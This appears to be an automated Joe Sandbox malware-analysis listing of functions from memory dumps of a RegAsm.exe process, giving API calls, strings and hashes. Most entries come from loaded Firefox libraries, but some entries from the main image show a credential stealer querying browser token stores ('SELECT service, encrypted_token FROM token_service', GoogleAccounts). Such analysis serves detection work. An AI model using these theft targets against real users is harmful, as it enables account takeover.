                                                                                    • Opcode ID: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                                    • Instruction ID: 0c4efa25f905736eceef55707aba2a532bc01767e8cc9e2cc0dd2c328e6e6fd5
                                                                                    • Opcode Fuzzy Hash: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                                    • Instruction Fuzzy Hash: 97B1C4B0A0120A9BDB14CFA9C895BEEBBB5FF85358F104019D905ABF80F7319945CBE1
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C5A3
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6CC5C9EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC5C9FB
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC5CA12
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC5CA2E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC5CAA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                    • String ID: (null)$0
                                                                                    • API String ID: 4074790623-38302674
                                                                                    • Opcode ID: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                                    • Instruction ID: 0d33ddf7d7e43faeb4ab26ca9b4bae91f20132de202599faa0f6807b7c72b0ef
                                                                                    • Opcode Fuzzy Hash: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                                    • Instruction Fuzzy Hash: C9A19C716083429FDB00DF29C98475ABBF1FF89748F44882DE899D7641EB31D825CB9A
                                                                                    APIs
                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C784
                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC5C801
                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CC5C83D
                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC5C891
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                    • String ID: INF$NAN$inf$nan
                                                                                    • API String ID: 1991403756-4166689840
                                                                                    • Opcode ID: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                                    • Instruction ID: 4c7851381f7f93ec6a11652519b002619245002b9f1df180a070a7477c6520a2
                                                                                    • Opcode Fuzzy Hash: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                                    • Instruction Fuzzy Hash: 73517F709087408BD700EF6DC58129AFBF0BF9E348F408A2DE9D5A7651F770D9A58B46
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33492
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334A9
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334EF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC3350E
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC33522
                                                                                    • __aulldiv.LIBCMT ref: 6CC33552
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC3357C
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33592
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                    • API String ID: 3634367004-706389432
                                                                                    • Opcode ID: ff96e90ec97a0c72975c3f0b5b8e4e55d8daf5a1710aa8b6562444c51d891652
                                                                                    • Instruction ID: edc28577c8aea47a583d8feb27e1eaa829eea6e1ce6bde14b464af23201402fb
                                                                                    • Opcode Fuzzy Hash: ff96e90ec97a0c72975c3f0b5b8e4e55d8daf5a1710aa8b6562444c51d891652
                                                                                    • Instruction Fuzzy Hash: 4D318F79B00216AFDF04DFF9D9A8AAA77B5FB45304F140029E905A3760FB74A905CB64
                                                                                    APIs
                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CD9DE64), ref: 6CD9ED0C
                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD9ED22
                                                                                      • Part of subcall function 6CDAB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE818D0,?), ref: 6CDAB095
                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CD9ED4A
                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CD9ED6B
                                                                                    • PR_CallOnce.NSS3(6CEB2AA4,6CDB12D0), ref: 6CD9ED38
                                                                                      • Part of subcall function 6CCD4C70: TlsGetValue.KERNEL32(?,?,?,6CCD3921,6CEB14E4,6CE1CC70), ref: 6CCD4C97
                                                                                      • Part of subcall function 6CCD4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CCD3921,6CEB14E4,6CE1CC70), ref: 6CCD4CB0
                                                                                      • Part of subcall function 6CCD4C70: PR_Unlock.NSS3(?,?,?,?,?,6CCD3921,6CEB14E4,6CE1CC70), ref: 6CCD4CC9
                                                                                    • SECOID_FindOID_Util.NSS3(?), ref: 6CD9ED52
                                                                                    • PR_CallOnce.NSS3(6CEB2AA4,6CDB12D0), ref: 6CD9ED83
                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CD9ED95
                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CD9ED9D
                                                                                      • Part of subcall function 6CDB64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CDB127C,00000000,00000000,00000000), ref: 6CDB650E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                    • String ID: security
                                                                                    • API String ID: 3323615905-3315324353
                                                                                    • Opcode ID: f8582a26d9f356dd89830b157021634440e3af62758b263e2923c0f2f0eb31ed
                                                                                    • Instruction ID: 04b32407ce55f249f2414cd1245f69fc2a5dee33a398d26d5a85c871f02ba9b2
                                                                                    • Opcode Fuzzy Hash: f8582a26d9f356dd89830b157021634440e3af62758b263e2923c0f2f0eb31ed
                                                                                    • Instruction Fuzzy Hash: 77116AB9D00214ABE7105762AC85BBFB278BF4260CF050828E84673E70FB35A50DC6E6
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$moz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3009372454-0
                                                                                    • Opcode ID: 7b37956dfa3fc138de62f9958c9f244c03cc508dae8da5b364b3fa484d6a3722
                                                                                    • Instruction ID: ff3c0450668a1d5056512e62edd2afd3b279d8599230692782be0fb4514e6c8c
                                                                                    • Opcode Fuzzy Hash: 7b37956dfa3fc138de62f9958c9f244c03cc508dae8da5b364b3fa484d6a3722
                                                                                    • Instruction Fuzzy Hash: FBB1D671A015208FDB14DF2CE89476D7BB1AF42318F185669E81ADFB96F732D840CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                    • String ID:
                                                                                    • API String ID: 1192971331-0
                                                                                    • Opcode ID: 7955cbc67ea8520dd5f9505be140c231ceab7df21003ad080998791025faa6a6
                                                                                    • Instruction ID: e3348bc33ade1096fecf8a16a0bfc9527c122150a00c4ea79ebfef773ae178c0
                                                                                    • Opcode Fuzzy Hash: 7955cbc67ea8520dd5f9505be140c231ceab7df21003ad080998791025faa6a6
                                                                                    • Instruction Fuzzy Hash: 1E3185B19047458FDB00EFBDD68926EBBF0FF85305F014A2DE98587261EB709458CB92
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00407ECC
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004080EE
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408113
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004081FD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408211
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                    • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                    • API String ID: 832884763-1713091031
                                                                                    • Opcode ID: 9e473acaa7000a16f916d9206d318f59038c924e77a66daf7054869979685d7c
                                                                                    • Instruction ID: 2ff93f77293c051160f002e01a69198dfe14dafa49777a61f2f3f3b536af27c9
                                                                                    • Opcode Fuzzy Hash: 9e473acaa7000a16f916d9206d318f59038c924e77a66daf7054869979685d7c
                                                                                    • Instruction Fuzzy Hash: 2DC14A71904248EADB15EBE5D956BEDBBB4AF18308F5040BEE406725C2DF782B0CCB25
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 409848716-3880535382
                                                                                    • Opcode ID: 375ecae539433f7f7cea4ae29875b971b86db83afa0741fd80b2b20a701fa365
                                                                                    • Instruction ID: 0a6b52c396934239eb5382cd11bc346325642a2a766f28994c9e4afe120d67a2
                                                                                    • Opcode Fuzzy Hash: 375ecae539433f7f7cea4ae29875b971b86db83afa0741fd80b2b20a701fa365
                                                                                    • Instruction Fuzzy Hash: 1F41B1B87002159FDF00CFE9D9C5A9677B8EB89318F008169ED15A7B40F730E904CBA5
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                    • String ID: 0123456789ABCDEF
                                                                                    • API String ID: 1978830238-2554083253
                                                                                    • Opcode ID: a2989fa1e50e5d37120eefcfde3128a28aff9e0de93a4de063f4f4f7d77498a0
                                                                                    • Instruction ID: aacaa05fe8bfb0e3e580230c96c2234c1107ce4164968389f5103032efb5c2f5
                                                                                    • Opcode Fuzzy Hash: a2989fa1e50e5d37120eefcfde3128a28aff9e0de93a4de063f4f4f7d77498a0
                                                                                    • Instruction Fuzzy Hash: 9631C272A00115AFDB04EFAACC45AAF7BADEF49354B00447EF901EB2D1DA789905C764
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EC1
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EE1
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F38
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F5C
                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC31F83
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FC0
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FE2
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FF6
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC32019
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 2055633661-2608361144
                                                                                    • Opcode ID: a8e5292d97d38529cc530a25ba1d5e297e7eff6e685b3af6487fa51d015deab8
                                                                                    • Instruction ID: bd456f5023fca5b3950fc2b9c186538b2e9f57e5a177241b6ba9974f19da1abf
                                                                                    • Opcode Fuzzy Hash: a8e5292d97d38529cc530a25ba1d5e297e7eff6e685b3af6487fa51d015deab8
                                                                                    • Instruction Fuzzy Hash: E541C175B002258FDF009FE9D8D8B6A37B5EF4A748F140069F909A7741EB7598048BD9
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6CC96009
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC96024
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CC3EE51,?), ref: 6CC96046
                                                                                    • OutputDebugStringA.KERNEL32(?,6CC3EE51,?), ref: 6CC96061
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC96069
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96073
                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96082
                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CCB148E), ref: 6CC96091
                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CC3EE51,00000000,?), ref: 6CC960BA
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC960C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                    • String ID:
                                                                                    • API String ID: 3835517998-0
                                                                                    • Opcode ID: 1c4ecad380a71adc1bab727fc8fc6dbdfbb1e15581c2204a0f7a149ec270915f
                                                                                    • Instruction ID: 3e53671e8ef5929d5497ef3d81b90d9c2128a7ac96b1f4b1926f6fe6d3086454
                                                                                    • Opcode Fuzzy Hash: 1c4ecad380a71adc1bab727fc8fc6dbdfbb1e15581c2204a0f7a149ec270915f
                                                                                    • Instruction Fuzzy Hash: F521F4B1A002189FDF105F64DC88AAE7BB8FF45318F008428F81AD7680DB74A559CFE9
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80039
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC80041
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80075
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC80082
                                                                                    • moz_xmalloc.MOZGLUE(00000048), ref: 6CC80090
                                                                                    • free.MOZGLUE(?), ref: 6CC80104
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC8011B
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6CC8005B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                    • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                    • API String ID: 3012294017-637075127
                                                                                    • Opcode ID: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
